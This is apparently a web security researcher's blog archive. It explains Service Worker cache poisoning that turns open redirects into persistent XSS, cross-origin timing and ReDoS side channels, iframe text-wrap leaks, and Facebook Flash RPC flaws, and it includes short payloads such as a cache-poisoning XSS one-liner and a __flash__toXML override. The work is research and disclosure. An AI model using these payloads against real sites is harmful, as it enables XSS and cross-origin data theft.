Wednesday, May 27, 2015

[Service Workers] Secure Open Redirect becomes XSS Demo

This is the shortest delay between blog posts I've had in a while, but I figured that since my  last post had some confusing stuff, it might make sense to add a short demo. The demo application has three things that enable the attack:

  1. An open redirect. Available at /cgi-bin/redirect?continue=.
  2. A Cache Service Worker. Available at /sw.js.
  3. A page that embeds images via <img crossorigin="anonymous" src="" />.
And the attacker's site has one thing:
  1. A CORS enabled attack page. Available at /cgi-bin/attack.
Let's do the attack then! For it to work we need two things to happen:
  • The service worker must be installed.
  • A request to our attack page must be cached with mode=cors.
Our index.html page will do both of those things for us.
Poison Cache

Image URL:

When you click submit above the following things will happen:
  1. A service worker will be installed for the whole origin.
  2. An image tag pointing to the open redirect will be created.
  3. The service worker will cache the request with the CORS response of the attacker.
If all went well, the page above should be "poisoned", and forever (or until the SW updates it's cache) you will get the XSS payload. Try it (note that you must have first "poisoned" the response above, if you click the button below here before poisoning the cache first, you will ruin the demo for ever since an opaque response will get cached ;):
If the demo doesn't work for you, that probably means you navigated to the attack page before caching the CORS response. If that's the case, to clear the cache.

Note you need Chrome 43 or later for this to work (or a nightly version of Firefox with the flags flipped). Hope this clarifies things a bit!

Monday, May 25, 2015

[Service Workers] New APIs = New Vulns = Fun++

Just came back from another great HackPra Allstars, this time in the beautiful city of Amsterdam. Mario was kind enough to invite me to ramble about random security stuff I had in mind (and this year it was Service Workers). The presentation went OK and it was super fun to meet up with so many people, and watch all those great presentations.

In any case, I promised to write a blog post to repeat the presentation but in a written form, however I was hoping to watch the video to see what mistakes I might have made and correct them in the blog post, and the video is not online yet. Anyway, so, until then, today this post is about something that wasn't mentioned in the talk.

This is about what type of vulnerabilities applications using Service Workers are likely to create. To start, I just want to say that I totally love Service Workers! It's APIs are easy to use and understand and the debugging tools in Chrome are beautiful and well done (very important since tools such as Burp or TamperChrome wouldn't work as well with offline apps as no requests are actually done.) You can clearly see that a lot of people have thought a lot about this problem, and there is some serious effort around making offline application development possible.

The reason this blog post content wasn't part of the presentation is because I thought it already had too much content, but if you don't know how Service Workers work, you might want to see the first section of the slides (as it's an introduction) or you can read this article or this video.

Anyway, so back to biz.. Given that there aren't many "real" web applications using Service Workers, I'll be using the service-worker samples from the w3c-webmob, but as soon as you start finding real service worker usage take a look and let me know if you find these problems too!

There are two main categories of potential problems I can see:
  1. Response and Caching Issues
  2. Web JavaScript Web Development

Response and Caching Issues

The first "category" or "family" of problems are response and caching issues. These are issues that are present because of the way responses are likely to be handled by applications.

Forever XSS

The first problem, that is probably kind-of bad, is the possibility of making a reflected XSS into a persistent XSS. We've already seen this type of problems based on APIs like localStorage before, but what makes this difference is that the Cache API is actually designed to do exactly that!

When the site is about to request a page from the web, the service worker is consulted first. The service worker at this point can decide to respond with a cache response (it's logic is totally delegated to the Service Worker). One of the main use-cases for service workers is to serve a cached-up copy of the request. This cache is programmatic and totally up-to the application to decide how to handle it.

One coding pattern for Service Workers is to respond with whatever is in the cache, if available or, to make a request if not (and cache the response). In other words, in those cases, no request is ever made to the server if the request matches a cached response. Since this Cache database is accessible to any JS code running in the same origin, an attacker can pollute the Cache with whatever it wants, and let the client serve the malicious XSS for ever!

If you want to try this out, go here:

Then fake an XSS by typing this to the console:'prefetch-cache-v1').then(function(cache){cache.put(new Request('index.html', {mode: 'no-cors'}), new Response('\x3cscript>alert(1)\x3c/script>', {headers: {'content-type': 'text/html'}}))})

Now whenever you visit that page you will see an alert instead! You can use Control+Shift+R to undo it, but when you visit the page again, the XSS will come back. It's actually quite difficult to get rid of this XSS. You have to manually delete the cache :(.

This is likely to be an anti-pattern we'll see in new Service-Workers enabled applications often. To prevent this, one of the ideas from Jake Archibald is to simply check the "url" property of the response. If the URL is not the same as the request, then simply not use it, and discard it from the cache. This idea is quite important actually, and I'll explain why below.

When Secure Open Redirects become XSS

A couple years ago in a presentation with thornmaker we explained how open redirects can result in XSS and information leaks, and they were mostly limited to things such as redirecting to insecure protocols (like javascript: or data:). Service Workers, however, and in specific some of the ways that the Cache API is likely to be used, introduce yet another possibility, and one that is quite bad too.

As explained before, the way people seem to be coding over the Cache API is by reading the Request, fetching it, and then caching the Response. This is tricky, because when a service worker renders a response, it renders it from the same origin it was loaded from.

In other words.. let's say you have a website that has an open redirect..
And you have a service worker like this one:
What that service worker does, as the previous one, is simply cache all requests that go through by refetching and the service worker will cache the response from for the other request!

That means that next time the user goes to:
The request will be cached and instead of getting a 302 redirect, they will get the contents of

Note that for this to work, must include Access-Control-Allow-Origin: * as a response header, as otherwise the request won't be accepted. And you need to make the request be cors enabled (with a cross origin image, or embed request for example).

This means that an open redirect can be converted to a persistent XSS and is another reason why checking the url property of the Response is so important before rendering it (both from Cache and on code like event.respondWith(fetch(event.request))). Because even if you have never had an XSS, you can introduce one by accident. If I had to guess, almost all usages of Service Workers will be vulnerable to one or another variation of these types of attacks if they don't implement the response.url check.

There's a bunch of other interesting things you can do with Service Workers and Requests / Responses, mentioned in the talk and that I'll try to blog about later. For now though, let's change subject.

Web JavaScript Web Development

This will sound weird to some, but the JavaScript APIs in the browser don't actually include any good web APIs for building responses. What this means is that because Service Workers will now be kind-of like Web Servers, but are being put there without having any APIs for secure web development, then it's likely they will introduce a bunch of cool bugs.

JavaScript Web APIs aren't Web Service APIs

For starters, the default concerns are things that affect existing JS-based server applications (like Node.js). Things from RegExp bugs because the JS APIs aren't secure by default to things like the JSON API lack of encoding.

But another more interesting problem is that the lack of templating APIs in Service Workers means people will write code like this which of course means it's gonna be full of XSS. And while you could import a templating library with strict contextual auto-escaping, the lack of a default library means people are just likely to use insecure alternatives or just default to string concatenation (note things like angular and handlebars won't work here, because they work at the DOM level and the Service Workers don't have access to the DOM as they run way before the DOM is created).

It's also worth noting that thanks to the asynchronous nature of Service Workers (event-driven and promise-based) mixed with developers that aren't used to this, is extremely likely to introduce concurrency vulnerabilities in JS if people abuse the global scope, which while isn't the case today, is very likely to be the case soon.

Cross Site Request Forgery

Another concern is that CSRF protection will have to behave differently for Service Workers. In specific, Service Workers will most likely have to depend more on referrer/origin based checks. This isn't bad in and off itself, but mixing this with online web applications will most likely pose a challenge to web applications. Funnily, none of the demos I found online have CSRF protection, which remarks the problem, but also makes it hard for me to give you examples on why it's gonna be hard.

To give a specific example, if a web application is meant to work while offline, how would such application keep track of CSRF tokens? Once the user comes online, it's possible the CSRF tokens won't be valid anymore, and the offline application will have to handle that gracefully. While handling the fallback correctly is possible by simply doing different checks depending on the online state of the application, it's likely more people will get it wrong than right.


I'm really excited to see what type of web applications are developed with Service Workers, and also about what type of vulnerabilities they introduce :). It's too early to know exactly, but some anti-patterns are clearly starting to emerge as a result of the API design, or of the existing mental models on developers' heads.

Another thing I wanted to mention, before closing up is that I'll start experimenting writing some of the defense security tools I mentioned in the talk, if you want to help out as well, please let me know!

Saturday, May 31, 2014

[Matryoshka] - Web Application Timing Attacks (or.. Timing Attacks against JavaScript Applications in Browsers)

Following up on the previous blog post about wrapping overflow leak on frames, this one is also regarding the presentation Matryoshka that I gave in Hamburg during HackPra All Stars 2013 during Appsec Europe 2013.

The subject today is regarding web application timing attacks. The idea behind this attack is a couple of techniques on how to attack another website by using timing attacks. Timing attacks are very popular in cryptography, and usually focus on either remote services, or local applications. Recently, they've become a bit popular, and are being used to attack browser security features.

Today the subject I want to discuss is not attacking the browser, or the operating system, but rather, other websites. In specific, I want to show you how to perform timing attacks cross-domain whenever a value you control is used by another web application.

The impact of successfully exploiting this vulnerability varies depending on the application being attacked. To be clear, what we are attacking are JavaScript heavy applications that handle data somehow controlled by another website, such as cookies, the URL, referrer, postMessage, etc..

Overall though, the attack itself isn't new, and the application of the attack on browsers is probably predictable.. but when discussed it's frequently dismissed as unexploitable, or unrealistic. Now, before I get your hopes up, while I think it's certainly exploitable and realistic, it isn't as straightforward as other attacks.

We know that you can obviously know if your own code runs faster or slower, but, as some of you might want to correct me.. that shouldn't matter. Why? Well, because of the Same Origin Policy. In case you are not aware, the Same Origin Policy dictates that cant interact with It defines a very specific subset of APIs where communication is safe (like, say, navigation, or postMessage, or CORS).

The general wisdom says that to be vulnerable to information leak attacks, you need to opt-in to be vulnerable to them. That is, you have to be doing something stupid for stupid things to happen to you. For example, say you have code that runs a regular expression on some data, like:

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp( {
        e.source.postMessage('got a match!', e.source);

Well, of course it will be possible to leak information.. try it out here:

  • The secret is 0.0
  • The secret is 0.1
  • The secret is 0.2
  • ...
  • The secret is 0.9

You can claim this code is vulnerable and no one would tell you otherwise. "You shouldn't be writing code like this (tm)".

Now, what about this?

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp( {
        console.log('got a match');
    e.source.postMessage('finished', e.source);

Well, now it's tricky, right? In theory, this script isn't leaking any information to the parent page (except of course, how long it took to run the regular expression). Depending on who you ask, they will tell you this is a vulnerability (or.. not).

Now, it clearly is vulnerable, but let's figure out exactly why. There is one piece of information that is leaked, and that is, how long it took to run the regular expression. We control the regular expression, so we get to run any regular expression and we will get to learn how long it took to run.

If you are familiar with regular expressions, you might be familiar with the term "ReDoS", which is a family of regular expressions that perform a Denial of Service attack on the runtime because they run in exponential time. You can read more about it here. Well, the general premise is that you can make a regular expression take for-ever if you want to.

So, with that information, we can do the same attack as before, but this time, we will infer if we had the right match simply by checking if it took over N seconds to respond to our message, or well... if it returned immediately.

Let's give it a try:

  • The secret is 0.0[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.1[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.2[0-9.]+(.{0,100}){12}XXX
  • ...
  • The secret is 0.9[0-9.]+(.{0,100}){12}XXX

Did you notice that the right answer took longer than the others?

If you are an average security curmudgeon you will still say that the fault is at the vulnerable site, since it's opting-in to leak how long it took to run the regular expression. All developers are supposed to take care of these types of problems, so why not JavaScript developers?

Alright then, let's fix up the code:
onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp( {
        console.log('got a match');

That clearly has no feedback loop back to the parent page. Can we still attack it?

Well, now it gets tricky. When I told you that the Same Origin Policy isolates from I wasn't being totally honest. The JavaScript code from both, and run in the same thread. That is, if you have 3 iframes one pointing to, one pointing to and one pointing to then all of them run in the same thread.

Said in another way, if suddenly decides to run into an infinite loop, neither nor will be able to run in any JavaScript code. Don't believe me? Give it a try!


Did you notice that when you looped the "snakes" the counters in the other two iframes stopped? That's because both, the snakes and the puppies and the kittens all run in the same thread, and if one script keeps the thread busy, all the other scripts are paused.

Now, with that piece of information, a whole new world opens upon us. Now, we don't need the other page surrender any information to us. Simply by running in the same thread we do, we can guess how long their code takes to run!

One way to attack this is by simply asking the browser to run a specific piece of code every millisecond, and whenever we don't run, that means there's some other code keeping the interpreter busy at the time. We keep track of these delays and we then learn how long the code took to run.

Alright, but you might feel a bit disappointed, since it's really not common to have code that runs regular expressions on arbitrary content.. so this attack is kinda lame..

Well, not really. Fortunately there are plenty of web applications that will run all sorts of interesting code for us. When I described the attack to Stefano Di Paola (the developer of DOMinator), he told me that he always wanted to figure out what you could do with code that does jQuery(location.hash). This used to be an XSS, but then jQuery fixed it.. so no-more-XSS and if the code starts with a '#', then it is forced as a CSS selector.

He said that perhaps jQuery could leak timing information based on how long it took for it to run a specific selector over the code. I told him that was a great idea, and started looking into it. Turns out, there is a "contains" selector in jQuery that will essentially look at all the text content in the page and try to figure out what nodes "contain" such text.

It essentially finds a node, and then serializes it's text contents, and then searches for such value inside it. In a nutshell it does:


Which, is interesting, but it doesn't have the ReDoS vector we had with regular expressions. Figuring out if there was a match is significantly more complicated.. We need to know if the "haystack" found something (or not) which sounds, well.. complicated.

Can we get such granularity? Is it possible to detect the difference between "aaaa".indexOf("b") and "aaaa".indexOf("a")? There's clearly a running time difference, but the difference is so small we might not be able to measure it.

There is another, even cooler selector, the "string prefix" selector. Say, you have:

You can match it with:

But again, this is even more difficult than the indexOf() attack we were doing earlier.. The question now is can we detect string comparisons? Can we get enough accuracy out of that we get to know if string comparisons succeed?

To make the question clearer.. can we measure in JavaScript the difference between "wrong" == "right" and "right" == "right"?

In theory, it should be faster to compare "wrong" to "right" because the runtime can stop the comparison on the first character, while to be sure that "right" is equal to "right", then it needs to compare every character in the string to ensure it's exactly the same.

This should be easy to test. In the following iframe we make a quick experiment and measure:

  • Time taken to compare "aaaa.....a" (200k) to "foobar"
  • Time taken to compare "aaaa.....a" to "aaaa.....a"
We make the comparison 100 times to make the timing difference more explicit.

Unless something's gone totally wrong, you should see something like:
aaa..a == foobar : 0ms
aaa..a == aaa..a : 60ms
This strangely looking results mean, mostly, that comparing a very long string takes significantly more time than comparing two obviously different strings. The "obviously", as we will learn, is the tricky part.

What the JavaScript runtimes do is first, they try to take a shortcut. If the lengths are different, then they return false immediately. If they are the same, on the other hand, then they compare char-by-char. As soon as they find a character that doesn't match, it returns false.

But is it significant? And if so, how significant is it? To try and answer that question I ran several experiments. For instance, it's 2-10 times faster to make a "false" comparison, than a "true" comparison with just 18 characters. That means "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx" runs 2 to 10 times slower than "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyy". To be able to detect that, however, we need a lot of comparisons and a lot of samples to reduce noise. In this graph you can see how many thousands of iterations you need to be able to "stabilize" the comparison. What you should see in that graph is something like:

What that graph means is that after 120,000 iterations (that is 120,000 comparisons) the difference between "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyy" and "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx"  is stable and is 6 times slower. And, to be clear, that is 18 characters being different. This means that to be able to notice the 6X difference you would need to bruteforce the 18 characters at once. Even in the most optimistic scenarios, bruteforcing 18 characters is way out the question.

If you try to repeat the experiment with just 2 characters, the results are significantly different (note this graph rounds up results to the closest integer). You won't be able to notice any difference.. at all. The line is flat up to a million iterations. That means that comparing a million times "aa" vs "bb" runs in about the same amount of time (not as impressive as our 6X!).

But.. we don't always need impressive differences to be able to make a decision (see this graph without the rounding). With just two characters the difference looks roughly like this:
Which.. means it usually runs in exactly the same time, sometimes a tiny bit faster, but also many times slightly slower. In essence, it seems to run at about 1.02 times the speed of a false comparison.

Now, the fact this graph looks so messy means our exploit won't be as reliable, and will require significantly more samples to detect any changes. We now have in our hands a probabilistic attack.

To exploit this, we will need to perform the attack a couple hundred or a couple thousand, or a couple million times (this actually depends on the machine, a slow machine has more measurable results, but also has more noise, a fast machine has less measurable results, but we can do more accurate measurements).

With the samples we either average the results, or get the mean of means (which needs a lot of samples) or a chi squared test if we knew the variance or a student t test if you can assume a normal distribution (JavaScript's garbarge collector skews things a bit).

At the end of the day, I ended up creating my own test, and was able to brute force a string in a different origin via code that does:

if (SECRET == userSupplied) {
   // do nothing

Here are some results on string comparison on Chrome:
  • It is possible to bruteforce an 18 digit number in about 3 minutes on most machines.
    • Without the timing attack you would need to perform 5 quadrillion comparisons per second. With the timing attack you only need 1 million.
  • It is possible to reliably calculate a 9 character alphanumeric string in about 10 minutes.
    • This is different than the numbers because here we have 37 characters alphabet, and with numbers it's just 10.
If you are interested in playing around with it, and you have patience (a lot of patience!) check this and this. They will literally take 5-10 minutes to run, and it will simply try to order 7 strings according to the time they took to compare. Both of them run about a million string comparisons using window.postMessage as the input, so it takes a while.

If you have even more patience you can run this which will run different combinations of iterations/samples trying to figure out which works best (slow machines work better with less iterations and more samples, faster machines run best with more iterations and less samples).

So, summary!
  • Timing attacks are easy thanks to JavaScript's single-threadness. That might change with things like process isolation, but it will continue to be possible for the time being.
  • String comparison can be measured and attacked, but it's probabilistic and really slow with the existing attacks.
Let me know if you can improve the attack (if you can get it under 1 minute for a 18 digit number you are my hero!), find a problem in the sampling/data, or otherwise are able to generalize the ReDoS exploit to string comparison / indexOf operations :)

Another attack that might be worth discussing is that strings from different origins are both stored in the same hash table. This means that if we were able to measure a hashtable miss from a hashtable match, we could read strings cross-origin.

I spent a lot of time trying to make that to work, but it didn't work out. If you can do it, let me know as well :)

Thanks for reading!

Sunday, September 22, 2013

[Matryoshka] - Wrapping Overflow Leak on Frames

I just came back from a very fun trip around Europe. Among other places, I visited Hamburg, to attend HackPra 2013, which was hosted in AppSec Europe. In there I gave the presentation Matryoshka - titled after the famous Russian dolls.

Today I'm blogging about one of the subjects of that presentation, an information leak introduced by a "side channel" present in iframes. I didn't give much detail in the presentation since I was afraid I was gonna run out of time (this was just one part of the presentation). This blogpost is meant to add more detail, as well as give a couple more details I wasn't sure worked at the time of the presentation.

A quick summary of the problem is that, under certain circumstances, it is possible to know when text inside an iframe wraps to the next line. Text wrapping is when a line is longer than the width of the area it can be displayed into, so it needs to wrap to a second line.

Being able to detect text wrapping is an interesting problem, as it allows us to learn some information about the framed website, which might be particularly dangerous under some circumstances.

To show a small example, the following iframe is hosted in a different domain than this blog post:

We are disallowed to know what the contents are because of the Same Origin Policy. It's important to understand this, we can iframe anything, including third party sites to which you are authenticated to. This might include sites that contain secret information, like your email inbox, or your bank statements.

Now, let's see what we can do:

  • We can, change the width and height of this iframe at our will.
  • We can navigate the inner iframes from that page.
  • We can change the style of your scrollbars or detect their presence.
To clarify, changing the width and height of the iframe will allow us to force some content to wrap on to the next line. To exploit this we need to know whether the content wrapped or not.

Navigating Child Iframes

By navigating child iframes, we can change an otherwise innocuous iframe (such as a Facebook like button), to a domain we control. We can do this by design, even on cross-domain iframes, look:

The reason for this is because the window.frames[] property is exposed cross-origin, and it's allowed by the Same Origin Policy to navigate child frames, even those that are cross domain.

The reason this matters, is because once we control a child iframe in our target page, we can know the position of the iframe relative to the browser/screen. This will let us know if the content of the page wrapped, as we'll discuss later on.

Detecting when the text wraps to the next line is the corner stone of this attack.

Detecting Iframe Screen Coordinates

In Trident and Gecko based browsers, it is possible to detect the position of an iframe relative to the screen. This is interesting, as it allows us to know exactly when an iframe moves down because of text wrapping.

We detect this with one of two properties, either window.screenTop for Trident based browsers, or window.mozInnerScreenY for Gecko based browsers (and mouse events in general). These properties are only readable from within the target iframe, but as we explained before, it is perfectly possible to navigate our target site child iframes, and once we do that, we can reduce the width of our iframe until text doesn't fit in the line anymore, and moves the rest of the line to the next line, displacing our iframe.

Please note this proof of concept doesn't work in all browsers (notably, it only works in firefox/ie), so it might not work for you, but feel free to give it a try.

Detecting Scrollbars Presence

This is interesting, in some browsers, it is possible to apply CSS to the scrollbars of the iframe. This is important because this would leak whether the text wrapped contains a background-image, which would be requested when the scrollbar is shown. In some browsers you need to change the backgroundImage after the creation of the iframe for the image to be requested.

Please note this proof of concept doesn't work in all browsers (notably, this only only works webkit-based browsers), so it might not work for you, but feel free to give it a try.

What will happen when you click that button is:
  • The width of the iframe will be slowly reduced pixel by pixel.
  • When the word "dusk" wraps to the next line, it will display the vertical scrollbar.
  • When the vertical scrollbar is shown, the background image will be requested.
  • We detect when such requests happen by checking document.cookie.

Measuring Word Width

So far we found out a way to find when text wraps to the next line, either by detecting the presence of a scrollbar, or navigating a child iframe and detecting it's position relative to the screen monitor.

To measure a specific word width, we will follow the following steps:
  1. Resize the target iframe to:
    • width: 9999999px
    • height: smallest-without-scrollbar;
  2. Slowly reduce the width until the text wraps. (You can reduce in fraction of pixels).
    • If you are detecting a scrollbar, ensure to increase the height to make the scrollbar disappear.
    • If you are detecting text wrapped from a child iframe, detect changes from the new current position.
  3. Repeat
    • Record the exact width at which text wrapping happened.
We will actually learn things in a bit of an odd order. For this particular example, we will get the length of the following:
  • First wrapping:       hello, my name is bond, james bond.
  • Second wrapping:   the secret is on the island!
  • Third wrapping:      bond, james bond.
  • Fourth wrapping:    name is bond,
  • Fifth wrapping:       bond, james
  • Sixth wrapping:      the secret
  • Seventh wrapping:  my name
  • Eighth wrapping:    secret is
  • Ninth wrapping:      name is
  • Tenth wrapping:      is on
The exact fraction of pixel in which the line wraps (which by practice I've seen some times needs to be as accurate as 1E-10 pixels), tells us the length of the line.

By calculating the difference between different lines, we can also get the length of other sequence of words:
  1. hello, my name is
  2. hello, my james bond.
  3. hello, my name is bond.
  4. hello, is bond, james bond.
  5. hello, my bond, james bond.
  6. ...
And we can also get "bond" by subtracting (1) to (3). We can also get "james" by subtracting (3) to the first wrapping, etc..  We might not always get specific word length, and rather groups of two words, but the attack works to both cases.

The question now is.. how hard is it to go from the width of the word (or sequence of words) to the actual contents of them?

Turns out that usually, all letters have a different width, and as long as such width is unique, it's almost trivial to calculate which letters are in each wrapping (although we don't get the order of such letters).

The solution to this problem is the classic knapsack problem which I won't go into details of. While we won't be able to get the order of the letters, we can get which letters to a reasonable degree of accuracy, which should be sufficient to have a very good guess of the value.

It's unclear what's the best solution to this problem. This information leak isn't a vulnerability per-se in browsers, but rather a well known and understood feature. This blog post will hopefully trigger some discussion around this subject and we can come up with solutions.

One challenge is that if we stopped providing mozInnerScreenY / screenTop, then it would be significantly harder to detect and protect against clickjacking. So whichever solution we come up with needs to take that into consideration.

It's also worth mentioning what happens when our iframe is so small that a word doesn't even fit. Well, the answer is that individual characters wrap to the next line, and we can then extract the width of each individual character (rather than each word). This, unfortunately, doesn't work that well in normal websites, as by default they don't break words (unless overridden by CSS's break-word). If we are able to get this, however, it would be possible for us to obtain the order of the characters in each word (and completely read the contents of the iframe without having to guess).

And that was it! This attack allows you to steal contents from websites that don't use X-Frame-Options (or have a fixed CSS width) in all major browsers with browser standard functionality (no vuln up my sleeve!). I felt inclined to use an acronym for this attack (WOLF) since Thai Duong/Juliano Rizzo's attacks (POET, BEAST, CRIME) sound better than "cross-BLAH-jacking", and I like wolves (although, not as much as cats), specially since it kind of feels like insanity wolf to me.

Friday, December 16, 2011

Doing Cross Page Communication Correctly

I haven't updated this blog in more than one year (woops), but it seems like I still have a couple of followers, so I was thinking on what to write about. I was originally planning to post this on August, but the fix was delayed more than expected.

I decided to choose a random target on the interwebs to find an interesting vuln, and since Facebook recently launched it's "Whitehat Program", which rewards people that report them security vulnerabilities (kinda the same as Google's Vulnerability Reward Program), I chose them.

(Note: As of  December 15, Facebook says they have fixed the vulnerability, and awarded a $2,500 USD bounty).

So, I took a look at their "main JS file":

And well, first thing that came to my mind was RPC. Mostly, because I worked implementing the Apache Shindig's version of the Flash RPC, and have helped reviewing easyXDM's implementation, I just knew this is too hard to get right.

A simple grep for ".swf" in their all.js file lead us to "/swf/XdComm.swf". And since I didn't know what domain that was on I tried:

And that worked.

So let's see.. I sent it to and we get this:

There are several non-security-bugs in that code (some of which I decided to ignore for brevity and keep the WTF quota of this blog low).

In general the security problems found are not specific to FB at all, they are mostly, side effects of bad design decisions from either Flash or the browsers. However, this problems are widely known and can be abused by attackers to compromise information.

Calling security.allowDomain

The first thing I notice is that XdComm calls Security.allowDomain and Security.allowInsecureDomain. This allows to execute code in the context of so it's an Flash-XSS, FAIL #1.

The way you exploit this is by loading the victim SWF inside the attacker's SWF. That's it. The problem here is that Adobe provides only one API for enabling two very different functionalities. In this case, what Facebook wants is just allow an HTML container to call whitelisted 'callbacks' from the SWF, but inadvertently it is also allowing anyone to load the SWF inside another SWF and access all methods and variables, which can result in code execution.

Adobe actually acknowledges this is a problem, and they will make changes to support this two different use cases. The reason I don't provide a PoC is because there are several applications out there that depend on this behavior and can't easily deploy any fixes, and Adobe is working on fixing this at Flash (which is where it should be fixed). When there's a viable alternative or a good solution I'll post a PoC.
What FB should have done is keep this SWF out of
Getting the embedding page location

The second thing I notice is that it's getting the origin of the page hosting the SWF calling:
this.currentDomain ="self.document.domain.toString");
And as any Flash developer should know, isn't something you can actually trust, so now you can "cheat" XdComm.swf into thinking it's being embedded by a page it isn't by simply overriding __flash__toXML.

So, by abusing this vulnerable check, we can actually, listen and send messages on any LocalConnection channel. This doesn't only mean we just defeated the security of the transport, but that also, if any other SWF file uses LocalConnection in (or, we can sniff into that as well. So, FAIL #2.

It is hard, for a movie (or a plugin whatsoever) to know with certainty where it's being hosted. A SWF can be sure it's being hosted same domain, by requiring the hosting page to call a method in the Movie (added by ExternalInterface.addCallback), since by default, Flash only allows movies hosted in the same domain to call callback methods of a movie (this is what we do in Shindig for example), but besides that it's not so simple.

Some insecure methods exist and are widely used to know the hosting page, such as calling:"window.location.toString")
There are some variations of that code, such as calling window.location.href.toString, which is also simple to bypass by rewriting the String.toString method, and works on all browsers.

It's futile to try to "protect" those scripts, because of the way Flash handles ExternalInterface, it's possible to modify every single call made by the plugin, since when you call, what really happens is that the plugin injects a script to the window with:
ExecScript('try { __flash__toXML(' + yourCode + ') ; } catch (e) { "<undefined;>"; }');

And, __flash__toXML is a global function injected by Flash, which can be modified to return whatever we want.
    var o;
    window.__flash__toXML = function () { return o("potato") };
    window.__defineSetter__("__flash__toXML", function(x) {o = x;});
It's worth noting that Flash also bases some of it's security decisions on the value of window.location (such as, if a movie is allowed to be scripted from a website or not), and while this check is more difficult to tamper (and browsers actively fix it), it's still possible to do it, and it's even easier on other browsers such as Safari (in Mac OS) where you can just replace the function "__flash_getWindowLocation" and "__flash_getTopLocation".

Luckily, it seems like we might be able to get at least the right Origin in future versions of Flash, as Mozilla is proposing a new NPAPI call just for this. Let's just hope that Adobe makes this available to the SWF application via some API.

What FB should have done is namespace the channel names, and use some other way of verifying the page embedding the SWF (like easyXDM or Shindig does).

It is also possible for an attacker to specify what transport it wishes to use, so we might be able to force a page to use the Flash transport even when it might also support postMessage.

postMessage should be used cautiously

There's one last thing I found. Facebook has a file which seems to allow an attacker to forge (postMessage) messages as coming from into another page that allows framing arbitrary pages.

The Proof of Concept is located at

As you can see the page will allow an attacker to send messages and will also allow the attacker to specify the target origin. The attack seems to be hard to do since the "parent" seems to be hard coded. So this is FAIL #3.

This is a good demonstration why the existing implementation of postMessage is fundamentally broken, it's really easy for two different scripts to interfere with each other. I can't actually blame FB for that, it's more like a design problem in postMessage.

Luckily there's a new mechanism to use postMessage (called channel messaging), which partly solves this problem (or at least makes it harder to happen). You can read more about it here:

Random fact.. This is what Chrome uses internally to communicate with other components like the Web Inspector.

Vendor Response

I reported these issues from on Tuesday Aug 16 2011 at 2 PM (PST), with the draft of this blogpost, and got a human acknowledgement at 7PM. The issue was finally fixed on December 15 2011.


So well, this was my first post of 2011 (it's December!), and I actually made it because there was a few "de facto" knowledge about Flash that I wanted to put in writing somewhere, and because I had a look at Facebook regarding something not strictly related to work!

In general I am impressed on the security of Facebook applications. While doing this I got locked out of my account like 5 or 6 times (maybe they detected strange behavior?), I noticed several security protections in their API (, and they actually do protect against other security vulnerabilities that most websites don't know about (such as escaping bugs, content type sniffing, etc).

I was awarded a $2,500.00 USD bounty for this report (not sure how it was calculated), and I'm considering donating it to charity (it can become 5k!). Any suggestions?

Monday, July 05, 2010

Full Disclosure, Reverse Responsible Disclosure and Bob


I know I haven't posted for a long time, sorry.. I hope I still have some followers.

Today was an interesting day, I started the day with yet-another-xss on some social website, and I found a vulnerability (kinda lame) on Paypal, later on the day I met my girlfriend's parents, and now it's late, so I'm writing a blogpost.. One vulnerability report was done on a 'responsible way', and the other, on what I just called 'reverse responsible disclosure'.. I like to invent buzzwords (and they are all jokes, please don't use them on real life).

I do think responsible disclosure is important, mostly because giving advance notice to the vendor allows them to work on a fix, before the bad guys start exploiting it. That's what I've been using, and what I think is the right thing to do. However, this is something that, depends on the vendor as much as on the researcher.

I've been working with several vendors on fixing vulnerabilities, most notably Microsoft and Google, both (in my opinion) do work hard to fix stuff, Microsoft takes considerably a lot more time to fix stuff, but they do communicate with me, letting me know what they are doing, and also share their ideas of fixes with me, in case I have any opinions (and they do take them into consideration). This dialog, or a swift and fast fix of vulnerabilities (like today's youtube's XSS that was full disclosed but apparently fixed fast enough) is what I consider a responsible response from the vendor.. I know this is not an opinion shared between all the industry, and that the loooooooong patching cycles of Microsoft are largely criticised, but in general, they are not so bad apart from that.

Other vendors that work similarly are Adobe and Symantec (humm, except for this girl that seems to have a job she shouldn't), and I was happy to work with them as well.

Now, the bad guys..


While their developers seem to understand security vulnerabilities, their PM is probably living in the stone age.

Some time ago,, a security community I'm member of, created a project to make a security audit of SMF 2.0 before using it. It was great, the project found around 45 vulnerabilities, half of them serious, and they were mostly fixed (not all of them, but most of them were). The change log included credits and all, so it was great, and we declared the project as a success.

However, a few months later, the PM of SMF asked google to close our project page, because we were 'violating their license', thing that Google had to comply with. I had to remove the comments on the code, and the patches, code reviews, and repositories, so Google could re enable the project page (

Overall, this sucks. We did the project to help them, and we did asked them BEFORE if the way we were going to work was correct, I even sent an email asking for permission to redistribute their code with patches, but since I had no response, I decided to just mirror it for code reviews, but don't modify it. They keep on saying it's their right to protect their code, and etc.. but I really do think they acted wrong by not notifying us first.. (they had our contact email, and we interchanged a LOT of emails) when we did them a favor.

In the future, I don't recommend working with them, if you don't want to be stabbed on your back. I do think this response was very lame on their part.


Some of you may know Daniel Kerr, the developer of Open Cart, that thinks that Paypal, Google and Yahoo are always vulnerable to CSRF, and that an antivirus would stop CSRF attacks (thing that made more than one person laugh for a while). Someone already had a media circus with this guy, (he actually savotaged the security patches that another guy did because he refused to fix them). But now I will talk about something else.

A good friend, WHK is a skilled developer, that does security auditories as a hobby, he is known for finding stuff in several popular CMS and he found a couple of vulnerabilities in OpenCart, so he documented them. Overall, there are Local File Inclusion vulnerabilities, direct remote code execution, and yet another CSRF vulnerability that allows an attacker to take complete compromise of the server. His english is not very good so he asked me to contact the developer, which I did. My email was saying that WHK and a few other users where going to make a free auditory of OpenCart, and that he will get notified before making the new vulnerabilities public.

His response was:

I prefer if you mind your own business and not bother me or the opencart community. The exploit that is being discussed will be fixed in the next release. I don't need your services. Stop wasting my time.

Stop bothering me!

